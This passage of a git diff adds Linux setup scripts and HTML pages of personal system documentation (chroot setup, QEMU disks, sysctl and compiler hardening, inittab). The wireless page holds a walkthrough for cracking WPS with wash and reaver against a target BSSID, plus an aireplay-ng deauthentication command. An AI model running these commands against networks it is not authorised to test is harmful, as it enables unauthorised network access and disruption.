+    mkdir -p $CHROOT/usr/ports
+
+    mkdir -p $CHROOT/media
+
+    mkdir -p $CHROOT/dev
+    mkdir -p $CHROOT/tmp
+    mkdir -p $CHROOT/proc
+    mkdir -p $CHROOT/sys
+
+}
+
+
+enable_target () {
+
+    mount --bind /dev $CHROOT/dev
+    mount -vt devpts devpts $CHROOT/dev/pts
+    mount -vt tmpfs shm $CHROOT/dev/shm
+    mount -vt proc proc $CHROOT/proc
+    mount -vt sysfs sysfs $CHROOT/sys
+
+}
+
+print_target() {
+    echo "Device: $DEV"
+    echo "CHROOT: $CHROOT"
+    echo "Option Selected: $SETUP_TARGET"
+
+    echo "1.1.2 EFI block; ($BLK_EFI)"
+    echo "1.1.2 boot block; ($BLK_BOOT)"
+    echo "1.1.2 cryptlvm block; ($BLK_CRYPT)"
+    echo "1.1.2 root block; ($BLK_ROOT)"
+    echo "1.1.2 var block; ($BLK_VAR)"
+    echo "1.1.2 usr block; ($BLK_USR)"
+    echo "1.1.2 swap block; ($BLK_SWP)"
+    echo "1.1.2 home block; ($BLK_HOME)"
+
+
+}
+
+print_help() {
+	echo "usage: setup_target [options]"
+	echo "options:"
+	echo "  -p,   --partition           create partitions and file systems"
+	echo "  -m,   --mount               mount partitions on chroot"
+	echo "  -d,   --directory           keep temporary working directory"
+        echo "  -e,   --enable              enable chroot (proc,dev, sys...)"
+	echo "  -v,   --view                view environment vars and exit"
+	echo "  -h,   --help                print help and exit"
+}
+
+
+while [ "$1" ]; do
+            case $1 in
+                    -p|--partition)
+                            SETUP_TARGET="partition"
+                            print_target
+                            ConfirmOrExit
+                            partition_target
+                            exit 0 ;;
+                    -m|--mount)
+                            SETUP_TARGET="mount"
+                            print_target
+                            ConfirmOrExit
+                            mount_target
+                            exit 0 ;;
+                    -d|--directory)
+                            SETUP_TARGET="directory"
+                            print_target
+                            ConfirmOrExit
+                            directory_target
+                            exit 0 ;;
+                    -e|--enable)
+                            SETUP_TARGET="enable"
+                            print_target
+                            ConfirmOrExit
+                            enable_target
+                            exit 0 ;;
+                    -v|--view)
+                            SETUP_TARGET="view"
+                            print_target
+                            exit 0 ;;
+                    -h|--help)
+                            print_help
+                            exit 0 ;;
+                    *)
+                            echo "setup-target: invalid option $1"
+                            exit 1 ;;
+            esac
+            shift
+done
diff --git a/linux/scripts/setup-virtual.sh b/linux/scripts/setup-virtual.sh
new file mode 100644
index 0000000..3583bb6
--- /dev/null
+++ b/linux/scripts/setup-virtual.sh
@@ -0,0 +1,78 @@
+#!/bin/sh
+
+# First we define the function
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+DEV_NAME=${1}
+IMG=${2}.qcow2
+SIZE=${3}
+CHROOT="/mnt"
+DEV="/dev/${DEV_NAME}"
+
+echo "/srv/qemu/img/${IMG}"
+echo "${SIZE}"
+echo "DEV_NAME=${DEV_NAME}"
+echo "DEV=${DEV}"
+echo "CHROOT=${CHROOT}"
+
+ConfirmOrExit
+
+#qemu-img create -f qcow2 example.qcow2 20G
+qemu-img create -f qcow2 /srv/qemu/img/${IMG} ${SIZE}
+qemu-nbd -c ${DEV} /srv/qemu/img/${IMG}
+
+parted --script ${DEV} \
+    mklabel gpt \
+    unit mib \
+    mkpart primary 2 4 \
+    name 1 grub \
+    mkpart ESP fat32 4 128 \
+    name 2 efi \
+    mkpart primary ext4 128 1128 \
+    name 3 boot \
+    mkpart primary ext4 1128 12128 \
+    name 4 root \
+    mkpart primary ext4 12128 14128 \
+    name 5 var \
+    mkpart primary ext4 14128 100% \
+    name 6 lvm \
+    set 1 bios_grub on \
+    set 2 boot on \
+    set 6 lvm on
+
+kpartx -a -s -l -u ${DEV}
+
+mkfs.fat -F 32  /dev/mapper/${DEV_NAME}p2
+mkfs.ext4       /dev/mapper/${DEV_NAME}p3
+mkfs.ext4       /dev/mapper/${DEV_NAME}p4
+mkfs.ext4       /dev/mapper/${DEV_NAME}p5
+pvcreate	/dev/mapper/${DEV_NAME}p6
+
+mount /dev/mapper/${DEV_NAME}p4 $CHROOT
+mkdir -p $CHROOT/proc
+mkdir -p $CHROOT/sys
+mkdir -p $CHROOT/dev
+mkdir -p $CHROOT/media
+
+mkdir -p $CHROOT/boot
+mount /dev/mapper/${DEV_NAME}p3 $CHROOT/boot
+mkdir -p $CHROOT/boot/efi
+mount /dev/mapper/${DEV_NAME}p2 $CHROOT/boot/efi
+mkdir -p $CHROOT/var
+mount /dev/mapper/${DEV_NAME}p5 $CHROOT/var
diff --git a/linux/scripts/setup-x.sh b/linux/scripts/setup-x.sh
new file mode 100644
index 0000000..262b4dd
--- /dev/null
+++ b/linux/scripts/setup-x.sh
@@ -0,0 +1,96 @@
+#!/bin/bash
+
+# Absolute path to this script, e.g. /home/user/bin/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in, thus /home/user/bin
+SCRIPTPATH=$(dirname "$SCRIPT")
+
+DIR=$(dirname "$SCRIPTPATH");
+DIR_CONF=$DIR"/conf"
+
+
+
+prt-get depinst xorg-server \
+	xorg-xinit \
+	xorg-xrdb \
+	xorg-xdpyinfo \
+	xorg-xauth \
+	xorg-xmodmap \
+	xorg-xrandr \
+	xorg-xgamma \
+	xorg-xf86-input-evdev \
+	xorg-xf86-input-synaptics \
+	xsel \
+	xkeyboard-config
+
+prt-get depinst xorg-font-util \
+	xorg-font-alias \
+	xorg-font-dejavu-ttf \
+	xorg-font-cursor-misc \
+	xorg-font-misc-misc \
+	console-font-terminus \
+	xorg-font-terminus \
+	xorg-font-mutt-misc
+
+prt-get search xorg-font-bitstream | xargs sudo prt-get depinst
+prt-get search xorg-font-bh | xargs sudo prt-get depinst
+
+#prt-get search otf- | xargs sudo prt-get depinst
+#prt-get depinst otf-sourcecode
+
+prt-get depinst \
+            alsa-utils \
+            libdrm \
+            mesa3d \
+            ffmpeg \
+            gstreamer \
+            gstreamer-vaapi \
+            gst-plugins-base \
+            gst-plugins-good \
+            gst-plugins-bad \
+            gst-plugins-ugly \
+            cmus \
+            dmenu \
+            st \
+            gparted \
+            gimp \
+            libreoffice \
+            ca-certificates \
+            linux-pam \
+            gstreamer \
+            libgd \
+            icu \
+            syndaemon \
+	    firefox
+
+prt-get depinst \
+	openbox \
+	dwm \
+       	spectrwm \
+	mate
+
+ConfirmOrExit () {
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+echo "SCRIPT=$SCRIPT";
+echo "SCRIPTPATH=$SCRIPTPATH";
+echo "DIR=$DIR";
+echo "DIR_CONF=$DIR_CONF";
+ConfirmOrExit
+
+cp -R $DIR_CONF/etc/X11/* /etc/X11/
+
diff --git a/linux/sysctl.html b/linux/sysctl.html
new file mode 100644
index 0000000..9940d43
--- /dev/null
+++ b/linux/sysctl.html
@@ -0,0 +1,177 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.6.2. Sysctl</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="sysctl">2.6.2. Sysctl</h1>
+
+        <p>Sysctl references
+        <a href="https://wiki.archlinux.org/index.php/sysctl#TCP.2FIP_stack_hardening">Arch TCP/IP stack hardening</a>,
+        <a href="http://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html">Cyberciti Nginx Hardning</a>,
+        <a href="http://www.cyberciti.biz/faq/linux-kernel-etcsysctl-conf-security-hardening/">Cyberciti Security Hardening</a>.</p>
+
+        <pre>
+        #
+        # /etc/sysctl.conf: configuration for system variables, see sysctl.conf(5)
+        #
+
+        kernel.printk = 7 1 1 4
+
+        kernel.randomize_va_space = 2
+
+        # Shared Memory
+        #kernel.shmmax = 500000000
+        # Total allocated file handlers that can be allocated
+        # fs.file-nr=
+        vm.mmap_min_addr=65536
+
+        # Allow for more PIDs (to reduce rollover problems); may break some programs 32768
+        kernel.pid_max = 65536
+
+        #Yama LSM by default
+        kernel.yama.ptrace_scope = 1
+
+        #
+        # Filesystem Protections
+        #
+
+        # Optimization for port usefor LBs
+        # Increase system file descriptor limit
+        fs.file-max = 65535
+
+        # Hide symbol addresses in /proc/kallsyms
+        kernel.kptr_restrict = 2
+
+        #
+        # Network Protections
+        #
+
+        net.core.bpf_jit_enable = 0
+
+        # Increase Linux auto tuning TCP buffer limits
+        # min, default, and max number of bytes to use
+        # set max to at least 4MB, or higher if you use very high BDP paths
+        # Tcp Windows etc
+        net.core.rmem_max = 8388608
+        net.core.wmem_max = 8388608
+        net.core.netdev_max_backlog = 5000
+        net.ipv4.tcp_window_scaling = 1
+
+        #A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
+        net.ipv4.tcp_sack = 0
+
+        # Both ports linux-blob and linux-libre don't build with ipv6
+        # Disable ipv6
+        net.ipv6.conf.all.disable_ipv6 = 1
+        net.ipv6.conf.default.disable_ipv6 = 1
+        net.ipv6.conf.lo.disable_ipv6 = 1
+
+        # Tuen IPv6
+        #net.ipv6.conf.default.router_solicitations = 0
+        #net.ipv6.conf.default.accept_ra_rtr_pref = 0
+        #net.ipv6.conf.default.accept_ra_pinfo = 0
+        #net.ipv6.conf.default.accept_ra_defrtr = 0
+        #net.ipv6.conf.default.autoconf = 0
+        #net.ipv6.conf.default.dad_transmits = 0
+        #net.ipv6.conf.default.max_addresses = 0
+
+        # Avoid a smurf attack, ping scanning
+        net.ipv4.icmp_echo_ignore_broadcasts = 1
+
+        # Turn on protection for bad icmp error messages
+        net.ipv4.icmp_ignore_bogus_error_responses = 1
+
+        # Turn on syncookies for SYN flood attack protection
+        net.ipv4.tcp_syncookies = 1
+
+        ## protect against tcp time-wait assassination hazards
+        ## drop RST packets for sockets in the time-wait state
+        ## (not widely supported outside of linux, but conforms to RFC)
+        net.ipv4.tcp_rfc1337 = 1
+
+        ## tcp timestamps
+        ## + protect against wrapping sequence numbers (at gigabit speeds)
+        ## + round trip time calculation implemented in TCP
+        ## - causes extra overhead and allows uptime detection by scanners like nmap
+        ## enable @ gigabit speeds
+        net.ipv4.tcp_timestamps = 0
+        #net.ipv4.tcp_timestamps = 1
+
+        # Turn on and log spoofed, source routed, and redirect packets
+        net.ipv4.conf.all.log_martians = 1
+        net.ipv4.conf.default.log_martians = 1
+
+        ## ignore echo broadcast requests to prevent being part of smurf attacks (default)
+        net.ipv4.icmp_echo_ignore_broadcasts = 1
+
+        ## sets the kernels reverse path filtering mechanism to value 1(on)
+        ## will do source validation of the packet's recieved from all the interfaces on the machine
+        ## protects from attackers that are using ip spoofing methods to do harm
+        net.ipv4.conf.all.rp_filter = 1
+        net.ipv4.conf.default.rp_filter = 1
+        #net.ipv6.conf.default.rp_filter = 1
+        #net.ipv6.conf.all.rp_filter = 1
+
+
+        # Make sure no one can alter the routing tables
+        # Act as a router, necessary for Access Point
+        net.ipv4.conf.all.accept_redirects = 0
+        net.ipv4.conf.default.accept_redirects = 0
+        net.ipv4.conf.all.secure_redirects = 0
+        net.ipv4.conf.default.secure_redirects = 0
+        # No source routed packets here
+        # Discard packets with source routes, ip spoofing
+        net.ipv4.conf.all.accept_source_route = 0
+        net.ipv4.conf.default.accept_source_route = 0
+
+
+        net.ipv4.conf.all.send_redirects = 0
+        net.ipv4.conf.default.send_redirects = 0
+
+        net.ipv4.ip_forward = 0
+
+        # Increase system IP port limits
+        net.ipv4.ip_local_port_range = 2000 65000
+
+        # Increase TCP max buffer size setable using setsockopt()
+        net.ipv4.tcp_rmem = 4096 87380 8388608
+        net.ipv4.tcp_wmem = 4096 87380 8388608
+
+        # Disable proxy_arp
+        net.ipv4.conf.default.proxy_arp = 0
+        net.ipv4.conf.all.proxy_arp = 0
+
+        # Disable bootp_relay
+        net.ipv4.conf.default.bootp_relay = 0
+        net.ipv4.conf.all.bootp_relay = 0
+
+        # Decrease TCP fin timeout
+        net.ipv4.tcp_fin_timeout = 30
+        # Decrease TCP keep alive time
+        net.ipv4.tcp_keepalive_time = 1800
+        # Sen SynAck retries to 3
+        net.ipv4.tcp_synack_retries = 3
+
+        # End of file
+        </pre>
+
+        <p>Reload sysctl settings;</p>
+
+        <pre>
+        # sysctl --system
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/toolchain.html b/linux/toolchain.html
new file mode 100644
index 0000000..1ee7c89
--- /dev/null
+++ b/linux/toolchain.html
@@ -0,0 +1,187 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.6.3. Toolchain</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="toolchain">2.6.3. Toolchain</h1>
+
+        <p>Add flags to pkgmk configuration and change specific ports that
+        don't build with hardening flags. More information about
+        <a href="https://wiki.archlinux.org/index.php/DeveloperWiki:Security">arch security</a>,
+        gentoo security,
+        <a href="http://gcc.gnu.org/onlinedocs/gcc/Instrumentation-Options.html#Instrumentation-Options">gcc</a> instrumentation-options
+        and <a href="http://www.gnu.org/software/libc/manual/html_node/Configuring-and-compiling.html">glibc</a>
+        configuring and compiling. Edit /etc/pkgmk.conf;</p>
+
+        <pre>
+        export CPPFLAGS="-D_FORTIFY_SOURCE=2"
+        export CFLAGS="-O2 -march=native -mtune=native -fstack-protector-strong --param=ssp-buffer-size=4"
+        export CXXFLAGS="${CFLAGS}"
+        export LDFLAGS="-z relro"
+        </pre>
+
+        <p>Above should compile most of the packages, for more 
+        "restrict" and other flags combinations check <a href="conf/pkgmk.conf.harden">pkgmk.conf.handen</a>.</p>
+
+        <h3>Core</h3>
+
+        <p>Ports in core collection that need to be changed in order
+        to build with pkgmk harden configuration.</p>
+
+        <h4>Glibc</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/lfs/view/development/chapter06/glibc.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/glibc">arch</a></li>
+        </ul>
+
+        <pre>
+        export CPPFLAGS=""
+        export CFLAGS="-O2 -march=native -mtune=native"
+        export CXXFLAGS="${CFLAGS}"
+        export LDFLAGS=""
+        </pre>
+
+        <pre>
+        ../$name-${version:0:4}/configure --prefix=/usr \
+                --libexecdir=/usr/lib \
+                --with-headers=$PKG/usr/include \
+                --enable-kernel=3.12 \
+                --enable-add-ons \
+                --enable-static-nss \
+                --disable-profile \
+                --disable-werror \
+                --without-gd \
+                --enable-obsolete-rpc \
+                --enable-multi-arch \
+                --enable-stackguard-randomization \
+                --enable-stack-protector=strong
+        </pre>
+
+        <h4>Gcc</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/lfs/view/development/chapter06/gcc.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/gcc">arch</a></li>
+        </ul>
+
+        <pre>
+        export CPPFLAGS=""
+        export CFLAGS="-O2 -march=native -mtune=native"
+        export CXXFLAGS="${CFLAGS}"
+        export LDFLAGS=""
+        </pre>
+
+        <h4>Openssl</h4>
+
+        <p>Replace openssl by libressl, view if
+        <a href="https://raw.githubusercontent.com/6c37/crux-ports-dropin/3.3/libressl/Pkgfile">libressl port</a> from 6c37-dropin is updated with
+        latest <a href="https://raw.githubusercontent.com/libressl-portable/portable/master/ChangeLog">libressl upstream</a>. First install libressl
+        to ensure it gets all the sources;
+
+        <pre>
+        $ sudo prt-get depinst libressl
+        </pre>
+
+        <p>After complaining about openssl files remove openssl;
+
+        <pre>
+        $ sudo prt-get remove openssl
+        $ sudo prt-get depinst libressl
+        </pre>
+
+
+        <h4>libcap</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/lfs/view/development/chapter06/libcap.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/libcap">arch</a></li>
+        </ul>
+
+        <h4>bzip2</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/lfs/view/development/chapter06/bzip2.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/bzip2">arch</a></li>
+        </ul>
+
+        <h4>hdparm</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/hdparm.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/hdparm">arch</a></li>
+        </ul>
+
+        <h3>Opt</h3>
+
+        <h4>lsof</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/lsof.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/lsof">arch</a></li>
+        </ul>
+
+        <h4>python</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/python2.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/python2">arch</a></li>
+        </ul>
+
+        <h4>zip</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/zip.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/zip">arch</a></li>
+        </ul>
+
+        <h4>glew</h4>
+
+        <ul>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/glew">arch</a></li>
+        </ul>
+
+        <h4>dmenu</h4>
+
+        <ul>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/dmenu">arch</a></li>
+        </ul>
+
+        <h4>Boost</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/boost.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/boost">arch</a></li>
+        </ul>
+
+        <pre>
+        export CPPFLAGS=""
+        export CFLAGS="-O2 -march=native -mtune=native"
+        export CXXFLAGS="${CFLAGS}"
+        export LDFLAGS=""
+        </pre>
+
+        <h3>Contrib</h3>
+
+        <h4>gsl</h4>
+
+        <ul>
+            <li><a href="http://www.linuxfromscratch.org/blfs/view/svn/general/gsl.html">lfs</a></li>
+            <li><a href="https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/gsl">arch</a></li>
+        </ul>
+
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/tty-terminal.html b/linux/tty-terminal.html
new file mode 100644
index 0000000..60a9f5d
--- /dev/null
+++ b/linux/tty-terminal.html
@@ -0,0 +1,81 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.3. Consoles, terminals and shells</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>2.3. Consoles, terminals and shells</h1>
+
+        <dl>
+            <dt>Consoles</dt>
+            <dd>Consoles and Virtual Consoles provides input and output
+            with a computer using serial communication. Initially console
+            was a physical device containing a terminal with a monitor and
+            keyboard.</dd>
+
+            <dt>Terminal</dt>
+
+            <dd>A terminal provides text input/output environment
+            that can be used to interact with a console (monitor or keyboard)
+            or transmitted using serial communication.
+            Initially a terminal was a electronic device connected to a
+            microcomputer or mainframe that take input from a keyboard and
+            output to a text mode screen. Terminals or ttys are provided by the
+            kernel. Example of terminal emulators; tmux, ssh, st.<dd>
+
+            <dt>Shell</dt>
+            <dd>Shell are command line interpreter that a terminal
+            runs. Shells also manage foreground and background
+            processes. Example of shells dash and bash.</dd>
+        </dl>
+
+
+        <p>Content of /etc/inittab shows layout organization and default
+        run level and ttys;</p>
+
+        <pre>
+        #
+        # /etc/inittab: system runlevel description
+        #
+
+        # Runlevels:
+        #  0	Halt
+        #  1(S)	Single-user
+        #  2	Multi-user
+        #  3-5	Not used
+        #  6	Reboot
+
+        id:2:initdefault:
+
+        rc::sysinit:/etc/rc
+        rs:S1:wait:/etc/rc.single
+        rm:2:wait:/etc/rc.multi
+        rd:06:wait:/etc/rc.shutdown
+        su:S:wait:/sbin/sulogin -p
+
+        c1:2:respawn:/sbin/agetty --noclear 38400 tty1 linux
+        c2:2:respawn:/sbin/agetty 38400 tty2 linux
+        c3:2:respawn:/sbin/agetty 38400 tty3 linux
+        c4:2:respawn:/sbin/agetty 38400 tty4 linux
+        c5:2:respawn:/sbin/agetty 38400 tty5 linux
+        c6:2:respawn:/sbin/agetty 38400 tty6 linux
+        #s1:2:respawn:/sbin/agetty 38400 ttyS0 vt100
+
+        ca::ctrlaltdel:/sbin/shutdown -t3 -r now
+
+        # End of file
+        </pre>
+
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/wireless.html b/linux/wireless.html
new file mode 100644
index 0000000..e15b112
--- /dev/null
+++ b/linux/wireless.html
@@ -0,0 +1,133 @@
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>Wireless</title>
+    </head>
+    <body>
+        <a href="index.html">Tools Index</a>
+
+        <h1>Wireless</h1>
+
+        <h2>Manual configuration</h2>
+
+        <pre>
+        # iwlist wlp2s0 scan
+        # iwconfig wlp2s0 essid name_of_network
+        </pre>
+
+        <p>To get mac address of the target cell;</p>
+
+        <pre>
+        # iwlist wlp2s0 scan
+        </pre>
+
+        <p>Example output that matter;</p>
+
+        <pre>
+        Cell 03 - Address: A8:A6:68:98:0C:C5
+        </pre>
+
+
+        <h4>Recover Password WPS</h4>
+
+        <p>First check processes that interfere with state of the interface and kill them;</p>
+
+        <pre>
+        # airmon-ng check
+
+
+        Found 5 processes that could cause trouble.
+        If airodump-ng, aireplay-ng or airtun-ng stops working after
+        a short period of time, you may want to kill (some of) them!
+
+        PID     Name
+        1271    wpa_supplicant
+        1576    wpa_supplicant
+        1633    dhclient
+        Process with PID 1576 (wpa_supplicant) is running on interface wlan0
+        Process with PID 1633 (dhclient) is running on interface wlan0
+        </pre>
+
+        <p>Pkill or kill all of them, ex 1271;</p>
+
+        <pre>
+        # kill -15 1271
+        </pre>
+
+        <p>If that fails;</p>
+
+        <pre>
+        # kill -9 1271
+        </pre>
+
+        <p>If wireless card is intel;</p>
+
+        <pre>
+        # rmmod iwlmvm
+        # rmmod iwlwifi
+        # modprob iwlwifi
+        </pre>
+
+        <p>Put interface in monitor mode;</p>
+
+        <pre>
+        # iwconfig wlp2s0 mode monitor
+        # ifconfig wlp2s0 up
+        </pre>
+
+        <pre>
+        # airmon-ng start wlp2s0
+
+
+        Interface       Chipset         Driver
+
+        wlp2s0           Intel AC        iwlwifi - [phy1]
+                                        (monitor mode enabled on mon0)
+        </pre>
+
+        <p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p>
+
+        <pre>
+        # wash -i wlp2s0
+        </pre>
+
+        <p>If the program report "Found packet with bad FCS", run with -C;</p>
+
+        <pre>
+        # wash -C -i wlp2s0
+        </pre>
+
+        <p>Put mon0 on same channel of target cell;</p>
+
+        <pre>
+        # iwconfig mon0 channel 6
+        </pre>
+
+        <p>Start the magic;</p>
+
+        <pre>
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
+        </pre>
+
+        <p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p>
+
+        <pre>
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
+        </pre>
+
+        <p>-a address of access point, -c client to deauthenticate</p>
+
+        <pre>
+        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
+        </pre>
+
+
+        <a href="index.html">Tools Index</a>
+
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>